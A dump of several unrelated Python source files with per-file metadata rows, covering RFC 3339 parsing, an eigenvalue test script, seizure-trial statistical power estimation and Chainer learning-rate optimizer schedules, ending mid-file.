dt = dt.replace(microsecond=micro)
return dt
if udatetime:
rfc3339_to_nanoseconds_since_epoch = _rfc3339_to_nanoseconds_since_epoch_udatetime
rfc3339_to_datetime = _rfc3339_to_datetime_udatetime
else:
rfc3339_to_nanoseconds_since_epoch = (
_rfc3339_to_nanoseconds_since_epoch_string_split
)
rfc3339_to_datetime = _rfc3339_to_datetime_string_split
| 33.878788
| 98
| 0.639279
| 2,253
| 15,652
| 4.366178
| 0.118509
| 0.021958
| 0.040663
| 0.030497
| 0.861442
| 0.85768
| 0.84172
| 0.825557
| 0.822507
| 0.822507
| 0
| 0.040263
| 0.271659
| 15,652
| 461
| 99
| 33.952278
| 0.822632
| 0.474636
| 0
| 0.803653
| 0
| 0.009132
| 0.021934
| 0.011849
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03653
| false
| 0
| 0.050228
| 0
| 0.232877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22d3fd034b9ac746f36c5674edb936cb7063e9f0
| 11,274
|
py
|
Python
|
Projects/Project2/src/testing.py
|
robolux/Computational_Physics
|
46ca9f4234d614f5e5ad2717df3ad074eb2d60ca
|
[
"MIT"
] | null | null | null |
Projects/Project2/src/testing.py
|
robolux/Computational_Physics
|
46ca9f4234d614f5e5ad2717df3ad074eb2d60ca
|
[
"MIT"
] | null | null | null |
Projects/Project2/src/testing.py
|
robolux/Computational_Physics
|
46ca9f4234d614f5e5ad2717df3ad074eb2d60ca
|
[
"MIT"
] | null | null | null |
# Project 1 Testing - Computational Physics
# Hunter Phillips
import sys
import os.path
import numpy as nmp
from main import *
save_path = '../results'
# part b
case = 1
for w, g in enumerate(['1', '5'], 1):
for w2, g2 in enumerate(['4', '16', '64', '128'], 1):
for w3, g3 in enumerate(['2', '6', '12'], 1):
save_path = '../results/partb'
filename = os.path.join(save_path, "case" + str(case) + ".txt")
print(filename)
case = case + 1
with open (filename, 'w') as f_m: # with auto closes files which is helpful here
n_i = int(g2)
o_i = float(g)
p_i = int(g3)
t_i = 1e-10
iterations, tol, sorted_eigs, eig_compare, A, general_time, eig_compare2 = solve_low(n_i, 0, o_i, p_i, t_i)
f_m.write('\n\n' + '*'.__mul__(16)+'\n')
f_m.write('Part B'+'\n')
f_m.write('*'.__mul__(16) + '\n'+'\n')
f_m.write("Solution for Part B with n = %d, omega = %d, and rho max = %d took %g seconds\n" % (n_i, o_i, p_i, general_time))
f_m.write("Reached specified tolerance of (%.00E) in %g iterations\n" % (tol, iterations))
f_m.write("This translates to %.2f iterations/element\n" % (iterations/float(n_i**2)))
f_m.write('\nPart B Sol numpy .eig numpy .eigh\n*****************************************\n')
eig_num = [1.0]
for m in range(0, n_i):
eig_num.append(sorted_eigs[m][0])
eig_num.append(eig_compare[0][m])
eig_num.append(eig_compare2[0][m])
eig_num.pop(0) # could restart index instead, quick fix for right now
# this checks if eig has put the values in decending order
# and fixes the ordering if this is the case
# if the values are genuinally different without regard to order
# the test will still fail
rev_back = -2
trash_pass = [1.0]
rev_for = 1
dummy2 = 0
eig_num_dummy = nmp.copy(eig_num)
for h in range(0, nmp.size(eig_num_dummy)/3):
dummy2 = eig_num_dummy[nmp.size(eig_num_dummy)+rev_back]
trash_pass.append(dummy2)
rev_back = rev_back - 3
rev_for = rev_for + 3
trash_pass.pop(0)
trash_sorted = nmp.sort(trash_pass)
rev_back = -2
rev_for = 1
for h in range(0, nmp.size(eig_num_dummy)/3):
eig_num[rev_for] = trash_sorted[h]
rev_back = rev_back - 3
rev_for = rev_for + 3
counter = 0
for n in eig_num:
if counter == 0:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 1
elif counter == 1:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 2
elif counter == 2:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write('\n')
counter = 0
Pass_bool = False
for h in range(0,nmp.size(eig_num)/3):
if nmp.round(eig_num[0], 8) == nmp.round(eig_num[1], 8) == nmp.round(eig_num[2], 8):
Pass_bool = True
else:
Pass_bool = False
del eig_num[0:3]
if Pass_bool == True:
f_m.write('The Unit Tests have PASSED')
elif Pass_bool == False:
f_m.write('The Unit Tests have FAILED')
# Part D
case = 1
for w, g in enumerate(['1', '3', '7', '11'], 1):
for w2, g2 in enumerate(['4', '16', '64', '128'], 1):
for w3, g3 in enumerate(['2', '6', '36', '128'], 1): # make pmax higher to determine stability
save_path = '../results/partd'
filename = os.path.join(save_path, "case" + str(case) + ".txt")
print(filename)
case = case + 1
with open (filename, 'w') as f_m: # with auto closes files which is helpful here
n_i = int(g2)
o_i = float(g)
p_i = int(g3)
t_i = 1e-10
iterations, tol, sorted_eigs, eig_compare, A, general_time, eig_compare2 = solve_low(n_i, 2, o_i, p_i, t_i)
f_m.write('\n\n' + '*'.__mul__(16)+'\n')
f_m.write('Part D'+'\n')
f_m.write('*'.__mul__(16) + '\n'+'\n')
f_m.write("Solution for Part D with n = %d, omega = %d, and rho max = %d took %g seconds\n" % (n_i, o_i, p_i, general_time))
f_m.write("Reached specified tolerance of (%.00E) in %g iterations\n" % (tol, iterations))
f_m.write("This translates to %.2f iterations/element\n" % (iterations/float(n_i**2)))
f_m.write('\nPart D Sol numpy .eig numpy .eigh\n*****************************************\n')
eig_num = [1.0]
for m in range(0, n_i):
eig_num.append(sorted_eigs[m][0])
eig_num.append(eig_compare[0][m])
eig_num.append(eig_compare2[0][m])
eig_num.pop(0) # could restart index instead, quick fix for right now
rev_back = -2
trash_pass = [1.0]
rev_for = 1
dummy2 = 0
eig_num_dummy = nmp.copy(eig_num)
for h in range(0, nmp.size(eig_num_dummy)/3):
dummy2 = eig_num_dummy[nmp.size(eig_num_dummy)+rev_back]
trash_pass.append(dummy2)
rev_back = rev_back - 3
rev_for = rev_for + 3
trash_pass.pop(0)
trash_sorted = nmp.sort(trash_pass)
rev_back = -2
rev_for = 1
for h in range(0, nmp.size(eig_num_dummy)/3):
eig_num[rev_for] = trash_sorted[h]
rev_back = rev_back - 3
rev_for = rev_for + 3
counter = 0
for n in eig_num:
if counter == 0:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 1
elif counter == 1:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 2
elif counter == 2:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write('\n')
counter = 0
Pass_bool = False
for h in range(0,nmp.size(eig_num)/3):
if nmp.round(eig_num[0], 8) == nmp.round(eig_num[1], 8) == nmp.round(eig_num[2], 8):
Pass_bool = True
else:
Pass_bool = False
del eig_num[0:3]
if Pass_bool == True:
f_m.write('The Unit Tests have PASSED')
elif Pass_bool == False:
f_m.write('The Unit Tests have FAILED')
# Part E
case = 1
for w, g in enumerate(['0.01', '0.5', '1.0', '5.0'], 1):
for w2, g2 in enumerate(['4', '16', '64', '128'], 1):
for w3, g3 in enumerate(['2', '6', '36', '128'], 1): # make pmax higher to determine stability
save_path = '../results/parte'
filename = os.path.join(save_path, "case" + str(case) + ".txt")
print(filename)
case = case + 1
with open (filename, 'w') as f_m: # with auto closes files which is helpful here
n_i = int(g2)
o_i = float(g)
p_i = int(g3)
t_i = 1e-10
iterations, tol, sorted_eigs, eig_compare, A, general_time, eig_compare2 = solve_low(n_i, 1, o_i, p_i, t_i)
f_m.write('\n\n' + '*'.__mul__(16)+'\n')
f_m.write('Part E'+'\n')
f_m.write('*'.__mul__(16) + '\n'+'\n')
f_m.write("Solution for Part E with n = %d, omega = %d, and rho max = %d took %g seconds\n" % (n_i, o_i, p_i, general_time))
f_m.write("Reached specified tolerance of (%.00E) in %g iterations\n" % (tol, iterations))
f_m.write("This translates to %.2f iterations/element\n" % (iterations/float(n_i**2)))
f_m.write('\nPart E Sol w' + str(w) + ' numpy .eig numpy .eigh\n********************************************')
eig_num = [1.0]
for m in range(0, n_i):
eig_num.append(sorted_eigs[m][0])
eig_num.append(eig_compare[0][m])
eig_num.append(eig_compare2[0][m])
eig_num.pop(0) # could restart index instead, quick fix for right now
rev_back = -2
trash_pass = [1.0]
rev_for = 1
dummy2 = 0
eig_num_dummy = nmp.copy(eig_num)
for h in range(0, nmp.size(eig_num_dummy)/3):
dummy2 = eig_num_dummy[nmp.size(eig_num_dummy)+rev_back]
trash_pass.append(dummy2)
rev_back = rev_back - 3
rev_for = rev_for + 3
trash_pass.pop(0)
trash_sorted = nmp.sort(trash_pass)
rev_back = -2
rev_for = 1
for h in range(0, nmp.size(eig_num_dummy)/3):
eig_num[rev_for] = trash_sorted[h]
rev_back = rev_back - 3
rev_for = rev_for + 3
f_m.write('\n')
counter = 0
for n in eig_num:
if counter == 0:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 1
elif counter == 1:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 2
elif counter == 2:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write('\n')
counter = 0
Pass_bool = False
for h in range(0,nmp.size(eig_num)/3):
if nmp.round(eig_num[0], 8) == nmp.round(eig_num[1], 8) == nmp.round(eig_num[2], 8):
Pass_bool = True
else:
Pass_bool = False
del eig_num[0:3]
if Pass_bool == True:
f_m.write('The Unit Tests have PASSED')
elif Pass_bool == False:
f_m.write('The Unit Tests have FAILED')
f_m.write('\n\n')
| 44.039063
| 140
| 0.437289
| 1,455
| 11,274
| 3.188316
| 0.116838
| 0.069843
| 0.07092
| 0.031041
| 0.926277
| 0.920673
| 0.918948
| 0.914421
| 0.904936
| 0.904936
| 0
| 0.046588
| 0.430726
| 11,274
| 255
| 141
| 44.211765
| 0.676223
| 0.056768
| 0
| 0.884793
| 0
| 0.013825
| 0.120855
| 0.014224
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.138249
| 0.018433
| 0
| 0.018433
| 0.013825
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
a3ba3957ee6fb2252783fd0cdc5aaca1c6550300
| 11,719
|
py
|
Python
|
utility_code/empirical_estimation.py
|
GoldenholzLab/rct-SNR
|
d5d2268585add08f80cef883e6cd11443f0f7349
|
[
"MIT"
] | null | null | null |
utility_code/empirical_estimation.py
|
GoldenholzLab/rct-SNR
|
d5d2268585add08f80cef883e6cd11443f0f7349
|
[
"MIT"
] | null | null | null |
utility_code/empirical_estimation.py
|
GoldenholzLab/rct-SNR
|
d5d2268585add08f80cef883e6cd11443f0f7349
|
[
"MIT"
] | null | null | null |
import numpy as np
#import time
from .patient_population_generation import randomly_select_theo_patient_pop
from .patient_population_generation import generate_theo_patient_pop_params
from .patient_population_generation import generate_heterogeneous_placebo_arm_patient_pop
from .patient_population_generation import generate_heterogeneous_drug_arm_patient_pop
from .endpoint_functions import calculate_percent_changes
from .endpoint_functions import calculate_time_to_prerandomizations
from .endpoint_functions import calculate_fisher_exact_p_value
from .endpoint_functions import calculate_Mann_Whitney_U_p_value
from .endpoint_functions import calculate_logrank_p_value
def empirically_estimate_RR50_statistical_power(theo_placebo_arm_patient_pop_params,
theo_drug_arm_patient_pop_params,
num_theo_patients_per_trial_arm,
num_baseline_months,
num_testing_months,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma,
num_trials):
RR50_p_values = np.zeros(num_trials)
baseline_time_scaling_const = 1
testing_time_scaling_const = 1
for trial_index in range(num_trials):
[placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries ] = \
generate_heterogeneous_placebo_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_placebo_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma)
[drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries ] = \
generate_heterogeneous_drug_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_drug_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma)
placebo_arm_percent_changes = \
calculate_percent_changes(placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries)
drug_arm_percent_changes = \
calculate_percent_changes(drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries)
RR50_p_value = \
calculate_fisher_exact_p_value(placebo_arm_percent_changes,
drug_arm_percent_changes)
RR50_p_values[trial_index] = RR50_p_value
RR50_emp_stat_power = np.sum(RR50_p_values < 0.05)/num_trials
return RR50_emp_stat_power
def empirically_estimate_MPC_statistical_power(theo_placebo_arm_patient_pop_params,
theo_drug_arm_patient_pop_params,
num_theo_patients_per_trial_arm,
num_baseline_months,
num_testing_months,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma,
num_trials):
MPC_p_values = np.zeros(num_trials)
baseline_time_scaling_const = 1
testing_time_scaling_const = 1
for trial_index in range(num_trials):
[placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries ] = \
generate_heterogeneous_placebo_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_placebo_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma)
[drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries ] = \
generate_heterogeneous_drug_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_drug_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma)
placebo_arm_percent_changes = \
calculate_percent_changes(placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries)
drug_arm_percent_changes = \
calculate_percent_changes(drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries)
MPC_p_value = \
calculate_Mann_Whitney_U_p_value(placebo_arm_percent_changes,
drug_arm_percent_changes)
MPC_p_values[trial_index] = MPC_p_value
MPC_emp_stat_power = np.sum(MPC_p_values < 0.05)/num_trials
return MPC_emp_stat_power
def empirically_estimate_TTP_statistical_power(theo_placebo_arm_patient_pop_params,
theo_drug_arm_patient_pop_params,
num_theo_patients_per_trial_arm,
num_baseline_months,
num_testing_months,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma,
num_trials):
TTP_p_values = np.zeros(num_trials)
baseline_time_scaling_const = 1
testing_time_scaling_const = 28
num_testing_days = num_testing_months*testing_time_scaling_const
for trial_index in range(num_trials):
[placebo_arm_monthly_baseline_seizure_diaries,
placebo_arm_daily_testing_seizure_diaries ] = \
generate_heterogeneous_placebo_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_placebo_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma)
[drug_arm_monthly_baseline_seizure_diaries,
drug_arm_daily_testing_seizure_diaries ] = \
generate_heterogeneous_drug_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_drug_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma)
[placebo_arm_TTP_times, placebo_arm_observed_array] = \
calculate_time_to_prerandomizations(placebo_arm_monthly_baseline_seizure_diaries,
placebo_arm_daily_testing_seizure_diaries,
num_theo_patients_per_trial_arm,
num_testing_days)
[drug_arm_TTP_times, drug_arm_observed_array] = \
calculate_time_to_prerandomizations(drug_arm_monthly_baseline_seizure_diaries,
drug_arm_daily_testing_seizure_diaries,
num_theo_patients_per_trial_arm,
num_testing_days)
TTP_p_value = \
calculate_logrank_p_value(placebo_arm_TTP_times,
placebo_arm_observed_array,
drug_arm_TTP_times,
drug_arm_observed_array)
TTP_p_values[trial_index] = TTP_p_value
TTP_emp_stat_power = np.sum(TTP_p_values < 0.05)/num_trials
return TTP_emp_stat_power
| 56.07177
| 99
| 0.461899
| 897
| 11,719
| 5.347826
| 0.088071
| 0.062539
| 0.054201
| 0.04753
| 0.918491
| 0.871169
| 0.844486
| 0.783198
| 0.730665
| 0.72462
| 0
| 0.00564
| 0.515829
| 11,719
| 208
| 100
| 56.341346
| 0.839796
| 0.000939
| 0
| 0.729412
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017647
| false
| 0
| 0.058824
| 0
| 0.094118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a3d603c4ba585bb37a6d0da15a7eb5e707babc16
| 22,560
|
py
|
Python
|
nutszebra_optimizer.py
|
nutszebra/stochastic_depth
|
8c63cbbb9964f976c52eb0d55e94cbdda22e733e
|
[
"MIT"
] | 1
|
2017-01-06T13:16:17.000Z
|
2017-01-06T13:16:17.000Z
|
nutszebra_optimizer.py
|
nutszebra/stochastic_depth
|
8c63cbbb9964f976c52eb0d55e94cbdda22e733e
|
[
"MIT"
] | null | null | null |
nutszebra_optimizer.py
|
nutszebra/stochastic_depth
|
8c63cbbb9964f976c52eb0d55e94cbdda22e733e
|
[
"MIT"
] | null | null | null |
import six
import chainer
from chainer import optimizers
import nutszebra_basic_print
class Optimizer(object):
def __init__(self, model=None):
self.model = model
self.optimizer = None
def __call__(self, i):
pass
def update(self):
self.optimizer.update()
class OptimizerResnet(Optimizer):
def __init__(self, model=None, schedule=(int(32000. / (50000. / 128)), int(48000. / (50000. / 128))), lr=0.1, momentum=0.9, weight_decay=1.0e-4, warm_up_lr=0.01):
super(OptimizerResnet, self).__init__(model)
optimizer = optimizers.MomentumSGD(warm_up_lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.warmup_lr = warm_up_lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i == 1:
lr = self.lr
print('finishded warming up')
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerDense(Optimizer):
def __init__(self, model=None, schedule=(150, 225), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerDense, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerWideRes(Optimizer):
def __init__(self, model=None, schedule=(60, 120, 160), lr=0.1, momentum=0.9, weight_decay=5.0e-4):
super(OptimizerWideRes, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr * 0.2
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerSwapout(Optimizer):
def __init__(self, model=None, schedule=(196, 224), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerSwapout, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerXception(Optimizer):
def __init__(self, model=None, lr=0.045, momentum=0.9, weight_decay=1.0e-5, period=2):
super(OptimizerXception, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
self.period = int(period)
def __call__(self, i):
if i % self.period == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerVGG(Optimizer):
def __init__(self, model=None, lr=0.01, momentum=0.9, weight_decay=5.0e-4):
super(OptimizerVGG, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
# 150 epoch means (0.94 ** 75) * lr
# if lr is 0.01, then (0.94 ** 75) * 0.01 is 0.0001 at the end
if i % 2 == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerGooglenet(Optimizer):
def __init__(self, model=None, lr=0.0015, momentum=0.9, weight_decay=2.0e-4):
super(OptimizerGooglenet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i % 8 == 0:
lr = self.optimizer.lr * 0.96
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerNetworkInNetwork(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, weight_decay=1.0e-4, schedule=(int(1.0e5 / (50000. / 128)), )):
super(OptimizerNetworkInNetwork, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
self.schedule = schedule
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerGooglenetV2(Optimizer):
def __init__(self, model=None, lr=0.045, momentum=0.9, weight_decay=4.0e-5):
super(OptimizerGooglenetV2, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i % 2 == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerGooglenetV3(Optimizer):
def __init__(self, model=None, lr=0.045, decay=0.9, eps=1.0, weight_decay=4.0e-5, clip=2.0):
super(OptimizerGooglenetV3, self).__init__(model)
optimizer = optimizers.RMSprop(lr, decay, eps)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
clip = chainer.optimizer.GradientClipping(clip)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
optimizer.add_hook(clip)
self.optimizer = optimizer
def __call__(self, i):
if i % 2 == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerResNext(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, weight_decay=5.0e-4, schedule=(150, 225)):
super(OptimizerResNext, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerFractalNet(Optimizer):
def __init__(self, model=None, lr=0.02, momentum=0.9, schedule=(200, 300, 350, 375)):
super(OptimizerFractalNet, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
all_links = OptimizerFractalNet._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
optimizer.setup(link[0])
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerPyramidalResNet(Optimizer):
def __init__(self, model=None, lr=0.5, momentum=0.9, schedule=(150, 225), weight_decay=1.0e-4):
super(OptimizerPyramidalResNet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerStochasticDepth(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, schedule=(250, 375), weight_decay=1.0e-4):
super(OptimizerStochasticDepth, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
all_links = OptimizerStochasticDepth._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerResnetOfResnet(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, schedule=(250, 375), weight_decay=1.0e-4):
super(OptimizerResnetOfResnet, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
all_links = OptimizerStochasticDepth._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
